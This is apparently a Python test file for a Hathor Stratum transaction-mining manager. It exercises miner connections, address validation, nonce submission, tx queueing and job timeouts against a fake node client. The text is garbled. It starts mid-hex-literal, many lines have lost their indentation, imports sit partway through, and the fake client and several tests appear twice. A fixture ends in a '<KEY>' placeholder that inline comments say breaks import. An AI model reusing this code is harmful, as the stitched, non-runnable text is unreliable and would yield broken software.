'2cc12fc54250d39c8088fc0002d4d2a15def7604688e1878ab681142a7b155cbe52a6'
'b4e031250ae96db0a0002ad8d1519daaddc8e1a37b14aac0b045129c01832281fb1c0'
'2d873c7abbf9623731383164323332613136626139353030316465323264333135316'
'2303237652d3833623135646233343639373438626262396262393330363861383633'
'3634362d6365326637376239393130373434613162313665656666306630323161306'
'63200000002000000000000000080326758')
self._block_templates = [
BlockTemplate(data=BLOCK_DATA_1, height=0),
BlockTemplate(data=BLOCK_DATA_2, height=1),
]
def next_block_template(self) -> None:
self._current_index += 1
async def start(self):
pass
async def stop(self):
pass
async def get_block_template(self, address: Optional[str] = None) -> BlockTemplate:
return self._block_templates[self._current_index]
async def get_tx_parents(self) -> List[bytes]:
pass
async def push_tx_or_block(self, raw: bytes) -> bool:
self.next_block_template()
return True
class ManagerTestCase(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def _run_all_pending_events(self):
"""Run all pending events."""
# pending = asyncio.all_tasks(self.loop)
# self.loop.run_until_complete(asyncio.gather(*pending))
async def _fn():
pass
future = asyncio.ensure_future(_fn())
self.loop.run_until_complete(future)
def test_invalid_mining_address(self):
from hathorlib.exceptions import InvalidAddress
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
invalid_addresses = [
('Invalid base58', address[:-1] + 'I'), # No 'I' in base58 symbols.
('Invalid checksum', address[:-1] + 'A'),
('Invalid size (smaller)', address[:-1]),
('Invalid size (bigger)', address + '7'),
]
for idx, (cause, invalid_address) in enumerate(invalid_addresses):
with self.assertRaises(InvalidAddress):
print('Address #{}: {} ({})'.format(idx, cause, invalid_address))
TxMiningManager(backend=self.client, address=invalid_address)
def test_miner_connect_disconnect(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_connect_ready_disconnect(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(1, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_many_miners_connect_ready_disconnect(self, qty=5):
transport = Mock()
connections = []
for idx in range(qty):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=transport)
self.assertEqual(idx + 1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
connections.append(conn)
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
for idx, conn in enumerate(connections):
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(idx + 1, len(self.manager.miners))
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(qty, len(self.manager.miners))
self.manager.status()
for idx, conn in enumerate(connections):
conn.connection_lost(exc=None)
self.assertEqual(qty - idx - 1, len(self.manager.connections))
self.assertEqual(qty - idx - 1, len(self.manager.miners))
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_some_jsonrpc_methods(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
conn.send_result = MagicMock(return_value=None)
conn.method_extranonce_subscribe(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
conn.send_result = MagicMock(return_value=None)
conn.method_multi_version(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
def test_miner_method_subscribe_invalid_address1(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'abc!'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address2(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'ZiCa'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address3(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHXXX'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_valid_address(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_not_called()
transport.close.assert_not_called()
def _get_ready_miner(self, address: Optional[str] = None) -> StratumProtocol:
conn = StratumProtocol(self.manager)
conn._update_job_timestamp = False
transport = Mock()
conn.connection_made(transport=transport)
if address:
params = {'address': address}
else:
params = {}
conn.method_subscribe(params=params, msgid=None)
conn.method_authorize(params=None, msgid=None)
return conn
def test_miner_invalid_address(self):
conn = StratumProtocol(self.manager)
conn.send_error = MagicMock(return_value=None)
transport = Mock()
conn.connection_made(transport=transport)
params = {'address': 'X'}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_ADDRESS)
def test_miner_only_blocks_submit_failed_1(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params={}, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_2(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'abc!',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_3(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'ffff',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.JOB_NOT_FOUND)
def test_miner_only_blocks_submit_failed_4(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': 'FFZZ',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_5(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
def test_miner_only_blocks_submit(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Second submission: stale job
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn.current_job.height)
# conn.connection_lost(exc=None)
# self.loop.run_until_complete(self.manager.stop())
def test_miner_only_blocks_update_block(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# Hathor full node returned a new block template.
self.client.next_block_template()
self.loop.run_until_complete(self.manager.update_block_template())
self._run_all_pending_events()
self.assertEqual(1, conn.current_job.height)
def test_two_miners_same_submission_1(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
# First submission: success
params = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn1.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_called_once()
# As the main loop is not running, the jobs have not been updated yet.
# Second submission: success, but it won't be propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def test_two_miners_same_submission_2(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
params1 = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
params2 = {
'job_id': conn2.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
# First submission: success
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
conn1.method_submit(params=params1, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
# Run the main loop to update the jobs.
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn1.current_job.height)
self.assertEqual(1, conn2.current_job.height)
# As jobs have been updated, the submission from the second miner will be accepted but not propagated.
# Second submission: success and not propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params2, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def _run_basic_tx_tests(self, conn, tx_data, tx_nonce):
job = TxJob(tx_data)
ret = self.manager.add_job(job)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job)
self.assertTrue(ret)
# First submission: wrong nonce
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '84e20000',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
conn.send_result.assert_not_called()
self.assertFalse(conn.current_job.is_block)
# Second submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': tx_nonce,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Third submission: stale
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
def test_one_miner_one_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TX1_DATA, TX1_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
    def test_one_miner_two_txs(self):
        """Queue two tx jobs; the miner solves them in order, then gets a block."""
        conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertIsNotNone(conn.current_job)
        self.assertTrue(conn.current_job.is_block)
        self.assertEqual(0, conn.current_job.height)
        job1 = TxJob(TX1_DATA)
        job2 = TxJob(TX2_DATA)
        ret1 = self.manager.add_job(job1)
        ret2 = self.manager.add_job(job2)
        # job1 is dispatched immediately; job2 waits in the queue.
        self.assertFalse(conn.current_job.is_block)
        self.assertEqual(conn.current_job.tx_job, job1)
        self.assertTrue(ret1)
        self.assertTrue(ret2)
        # First submission: success
        params = {
            'job_id': conn.current_job.uuid.hex(),
            'nonce': TX1_NONCE,
        }
        conn.send_error = MagicMock(return_value=None)
        conn.send_result = MagicMock(return_value=None)
        conn.method_submit(params=params, msgid=None)
        conn.send_error.assert_not_called()
        conn.send_result.assert_called_once_with(None, 'ok')
        # Run loop and check that the miner gets the next tx
        self._run_all_pending_events()
        self.assertFalse(conn.current_job.is_block)
        self.assertEqual(conn.current_job.tx_job, job2)
        # Second submission: success
        params = {
            'job_id': conn.current_job.uuid.hex(),
            'nonce': TX2_NONCE,
        }
        conn.send_error = MagicMock(return_value=None)
        conn.send_result = MagicMock(return_value=None)
        conn.method_submit(params=params, msgid=None)
        conn.send_error.assert_not_called()
        conn.send_result.assert_called_once_with(None, 'ok')
        # Run loop and check that the miner gets a block
        self._run_all_pending_events()
        self.assertTrue(conn.current_job.is_block)
        self.assertEqual(0, conn.current_job.height)
    def test_mining_tx_connection_lost(self):
        """A queued tx survives all miners disconnecting and reaches a new miner."""
        conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertIsNotNone(conn1.current_job)
        self.assertTrue(conn1.current_job.is_block)
        self.assertEqual(0, conn1.current_job.height)
        conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertIsNotNone(conn2.current_job)
        self.assertTrue(conn2.current_job.is_block)
        self.assertEqual(0, conn2.current_job.height)
        job = TxJob(TX1_DATA)
        ret = self.manager.add_job(job)
        self.assertTrue(ret)
        # Both miners switch from block mining to the tx job.
        self.assertFalse(conn1.current_job.is_block)
        self.assertEqual(conn1.current_job.tx_job, job)
        self.assertEqual(conn2.current_job.tx_job, job)
        # Miner 1 disconnects.
        conn1.connection_lost(exc=None)
        self.assertFalse(conn2.current_job.is_block)
        self.assertEqual(conn2.current_job.tx_job, job)
        # Miner 2 disconnects. Tx stays on the queue.
        conn2.connection_lost(exc=None)
        self.assertEqual(deque([job]), self.manager.tx_queue)
        # Miner 3 connects. Tx is sent to the new miner.
        conn3 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertFalse(conn3.current_job.is_block)
        self.assertEqual(conn3.current_job.tx_job, job)
def test_token_creation_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TOKEN_CREATION_TX_DATA, TOKEN_CREATION_TX_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
    def test_no_miners_at_start(self):
        """Jobs queue up with growing expected queue times while no miner is online."""
        from txstratum.constants import DEFAULT_EXPECTED_MINING_TIME
        expected_queue_time = 0
        job1 = TxJob(TX1_DATA)
        self.assertTrue(self.manager.add_job(job1))
        self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job1.expected_mining_time)
        self.assertEqual(0, job1.expected_queue_time)
        self.assertEqual(1, len(self.manager.tx_queue))
        # Each queued job adds its expected mining time to the wait of the next one.
        if DEFAULT_EXPECTED_MINING_TIME > 0:
            expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
        job2 = TxJob(TX2_DATA)
        self.assertTrue(self.manager.add_job(job2))
        self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job2.expected_mining_time)
        self.assertEqual(expected_queue_time, job2.expected_queue_time)
        self.assertEqual(2, len(self.manager.tx_queue))
        if DEFAULT_EXPECTED_MINING_TIME > 0:
            expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
        job3 = TxJob(TOKEN_CREATION_TX_DATA)
        self.assertTrue(self.manager.add_job(job3))
        self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job3.expected_mining_time)
        self.assertEqual(expected_queue_time, job3.expected_queue_time)
        self.assertEqual(3, len(self.manager.tx_queue))
        self.assertEqual([job1, job2, job3], list(self.manager.tx_queue))
        # First miner connects and receives job1.
        conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertIsNotNone(conn1.current_job)
        self.assertEqual(job1, conn1.current_job.tx_job)
        # Second miner connects and receives job1.
        conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
        self.assertIsNotNone(conn2.current_job)
        self.assertEqual(job1, conn2.current_job.tx_job)
class ManagerClockedTestCase(asynctest.ClockedTestCase):  # type: ignore
    """Time-based manager tests driven by asynctest's controllable clock."""

    def setUp(self):
        """Start a manager against the fake client, with a patched clock."""
        address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
        from tests.utils import Clock
        self.clock = Clock(self.loop)
        self.clock.enable()
        self.client = HathorClientTest(server_url='')
        self.loop.run_until_complete(self.client.start())
        self.manager = TxMiningManager(backend=self.client, address=address)
        self.loop.run_until_complete(self.manager.start())
        self.loop.run_until_complete(self.manager.wait_for_block_template())
        self.assertTrue(len(self.manager.block_template) > 0)

    def tearDown(self):
        self.clock.disable()

    async def test_block_timestamp_update(self):
        """Job timestamp: updated when forced or recent, kept when too old."""
        job = self.manager.get_best_job(None)
        # Fix: this was `self.assertTrue(True, job.is_block)`, which always
        # passes because the second argument is only the failure message.
        self.assertTrue(job.is_block)
        job.update_timestamp(force=True)
        self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
        # Update timestamp.
        await self.advance(10)
        job.update_timestamp()
        self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
        # Do not update timestamp.
        old_ts = txstratum.time.time()
        await self.advance(40)
        job.update_timestamp()
        self.assertEqual(int(old_ts), job._block.timestamp)

    async def test_tx_resubmit(self):
        """A duplicate tx job is declined while pending, accepted after timeout."""
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        # When a similar job is submitted, manager declines it.
        job2 = TxJob(TX1_DATA)
        ret2 = self.manager.add_job(job2)
        self.assertFalse(ret2)
        # Wait until job1 is marked as timeout.
        await self.advance(15)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        # Try to resubmit a similar job.
        job3 = TxJob(TX1_DATA)
        ret3 = self.manager.add_job(job3)
        self.assertTrue(ret3)

    async def test_tx_timeout_and_cleanup(self):
        """A timed-out tx leaves the queue immediately and tx_jobs after cleanup."""
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        self.assertIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # Wait until job1 is marked as timeout.
        await self.advance(15)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # Wait until job1 is cleared.
        await self.advance(self.manager.TX_CLEAN_UP_INTERVAL)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertNotIn(job1.uuid, self.manager.tx_jobs)

    async def test_tx_race_condition(self):
        """Test race condition caused when job2 replaces job1 and job1's clean up is close to be executed.

        In this case job1's clean up was cleaning job2 instead.
        """
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        # Wait until job1 is marked as timeout.
        await self.advance(10)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # We are 1 second away to cleanup the tx.
        await self.advance(self.manager.TX_CLEAN_UP_INTERVAL - 1)
        # Resubmit a similar job.
        job2 = TxJob(TX1_DATA, timeout=10)
        ret2 = self.manager.add_job(job2)
        self.assertTrue(ret2)
        self.assertIn(job2, self.manager.tx_queue)
        self.assertIn(job2.uuid, self.manager.tx_jobs)
        # Reach the cleanup time of job1. Job1's cleanup must not touch job2.
        await self.advance(2)
        self.assertEqual(job2.status, JobStatus.ENQUEUED)
        self.assertIn(job2, self.manager.tx_queue)
        self.assertIn(job2.uuid, self.manager.tx_jobs)
        # Job2 timeouts.
        await self.advance(15)
        self.assertEqual(job2.status, JobStatus.TIMEOUT)


import asyncio
import unittest
from collections import deque
from typing import List, Optional
from unittest.mock import ANY, MagicMock, Mock
import asynctest # type: ignore
from hathorlib.client import BlockTemplate, HathorClient
import txstratum.time
from txstratum.jobs import JobStatus, TxJob
from txstratum.manager import TxMiningManager
from txstratum.protocol import StratumProtocol
# Serialized transaction fixtures plus the hex nonce that solves each one,
# as exercised by the tests below.
TX1_DATA = bytes.fromhex(
    '0001000102000000000000089c0d40a9b1edfb499bc624833fde87ae459d495000393f4aaa00006'
    'a473045022100c407d5e8f411f9ae582ebd7acbfcb6ea6170332709fb69acaa34c1b426f1d8f502'
    '2003847963768eca9bcdf46e758319fb2699fd28ab657d00f54bef46c37a90405e2103755f2920f'
    'f7dc32dc5414cea1cf9e078347f40894caf0c03637d083dbb261c5c000003e800001976a914a04c'
    '9e2a0291f53c618fdad2ecb37748efb0eeeb88ac0000151800001976a914545f1156a3b00df622b'
    '1d92968c21b962e9d7aa588ac4032a8228c4020c35ed18547020000000047c9881d2bf348d5ffd6'
    'ce8398d6bc5d17b3bea75a53c15b7480be950000006ed5794bf69ebe7d7d75e7a0024d98acb85cb'
    '9c101b59b8b6073e8667c84e2ee77'
)
TX1_NONCE = '84e2ee77'
TX2_DATA = bytes.fromhex(
    '00010001020000000000000896f3792cf52e13978baa98ac966639946b558190f52d1d8c4900006a473045'
    '022100cf557f80e59f4cc142dfeff28b54321c1787bc6faddb798093b9bd4e6fa32c60022055fbf4312f08'
    '19748a6480e0d1f7d70276b3cc12276d973f991bdb2f22250b972103755f2920ff7dc32dc5414cea1cf9e0'
    '78347f40894caf0c03637d083dbb261c5c0000170c00001976a914a04c9e2a0291f53c618fdad2ecb37748'
    'efb0eeeb88ac000001f400001976a914a04c9e2a0291f53c618fdad2ecb37748efb0eeeb88ac4032a8228c'
    '4020c35ed184d5020000006ed5794bf69ebe7d7d75e7a0024d98acb85cb9c101b59b8b6073e8667c000001'
    '2a9d7b6a8895fc1fde992187e742eff81ad2e40994b595cc45056d7bb333cf514a'
)
TX2_NONCE = '33cf514a'
TOKEN_CREATION_TX_DATA = bytes.fromhex(
    '00020104000005551d7740fd7d3c0acc50b5677fdd844f1225985aa431e1712af2a2fd'
    '8900006a473045022100a445edb5cd6c79a0a7b5ed837582fd65b8d511ee60b64fd076'
    'e07bd8f63f75a202202dca24320bffc4c3ca2a07cdfff38f7c839bde70ed49ef634ac6'
    '588972836cab2103bfa995d676e3c0ed7b863c74cfef9683fab3163b42b6f21442326a'
    '023fc57fba0000264800001976a9146876f9578221fdb678d4e8376503098a9228b132'
    '88ac00004e2001001976a914031761ef85a24603203c97e75af355b83209f08f88ac00'
    '00000181001976a9149f091256cb98649c7c35df0aad44d7805710691e88ac00000002'
    '81001976a914b1d7a5ee505ad4d3b93ea1a5162ba83d5049ec4e88ac0109546f546865'
    '4d6f6f6e04f09f9a804034a52aec6cece75e0fc0e30200001a72272f48339fcc5d5ec5'
    'deaf197855964b0eb912e8c6eefe00928b6cf600001055641c20b71871ed2c5c7d4096'
    # NOTE(review): '<KEY>' is a redaction placeholder left by the source
    # dump — it is not valid hex, so bytes.fromhex() raises ValueError at
    # import time. Restore the original final line before running.
    '<KEY>'
)
TOKEN_CREATION_TX_NONCE = '01ff7369'
class HathorClientTest(HathorClient):
    """Fake HathorClient that serves two canned block templates.

    Each successful ``push_tx_or_block`` advances to the next template,
    letting tests observe the miner's job height change from 0 to 1.
    """

    def __init__(self, server_url: str, api_version: str = '/v1a/'):
        # NOTE(review): super().__init__() is not called here, so no real
        # connection state is set up — confirm HathorClient holds no state
        # the manager relies on.
        self._current_index = 0
        BLOCK_DATA_1 = bytes.fromhex('000001ffffffe8b789180000001976a9147fd4ae0e4fb2d2854e76d359029d8078bb9'
                                     '9649e88ac40350000000000005e0f84a9000000000000000000000000000000278a7e')
        BLOCK_DATA_2 = bytes.fromhex('0000010000190000001976a9143d6dbcbf6e67b2cbcc3225994756a56a5e2d3a2788a'
                                     'c40350000000000005e0f84de03000006cb93385b8b87a545a1cbb6197e6caff600c1'
                                     '2cc12fc54250d39c8088fc0002d4d2a15def7604688e1878ab681142a7b155cbe52a6'
                                     'b4e031250ae96db0a0002ad8d1519daaddc8e1a37b14aac0b045129c01832281fb1c0'
                                     '2d873c7abbf9623731383164323332613136626139353030316465323264333135316'
                                     '2303237652d3833623135646233343639373438626262396262393330363861383633'
                                     '3634362d6365326637376239393130373434613162313665656666306630323161306'
                                     '63200000002000000000000000080326758')
        self._block_templates = [
            BlockTemplate(data=BLOCK_DATA_1, height=0),
            BlockTemplate(data=BLOCK_DATA_2, height=1),
        ]

    def next_block_template(self) -> None:
        """Switch to the next canned template."""
        self._current_index += 1

    async def start(self):
        pass

    async def stop(self):
        pass

    async def get_block_template(self, address: Optional[str] = None) -> BlockTemplate:
        """Return the currently selected canned template."""
        return self._block_templates[self._current_index]

    async def get_tx_parents(self) -> List[bytes]:
        # NOTE(review): returns None despite the List[bytes] annotation —
        # apparently unused by these tests; confirm before relying on it.
        pass

    async def push_tx_or_block(self, raw: bytes) -> bool:
        # Pretend the push succeeded and advance to the next template.
        self.next_block_template()
        return True
class ManagerTestCase(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def _run_all_pending_events(self):
"""Run all pending events."""
# pending = asyncio.all_tasks(self.loop)
# self.loop.run_until_complete(asyncio.gather(*pending))
async def _fn():
pass
future = asyncio.ensure_future(_fn())
self.loop.run_until_complete(future)
def test_invalid_mining_address(self):
from hathorlib.exceptions import InvalidAddress
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
invalid_addresses = [
('Invalid base58', address[:-1] + 'I'), # No 'I' in base58 symbols.
('Invalid checksum', address[:-1] + 'A'),
('Invalid size (smaller)', address[:-1]),
('Invalid size (bigger)', address + '7'),
]
for idx, (cause, invalid_address) in enumerate(invalid_addresses):
with self.assertRaises(InvalidAddress):
print('Address #{}: {} ({})'.format(idx, cause, invalid_address))
TxMiningManager(backend=self.client, address=invalid_address)
def test_miner_connect_disconnect(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_connect_ready_disconnect(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(1, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_many_miners_connect_ready_disconnect(self, qty=5):
transport = Mock()
connections = []
for idx in range(qty):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=transport)
self.assertEqual(idx + 1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
connections.append(conn)
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
for idx, conn in enumerate(connections):
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(idx + 1, len(self.manager.miners))
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(qty, len(self.manager.miners))
self.manager.status()
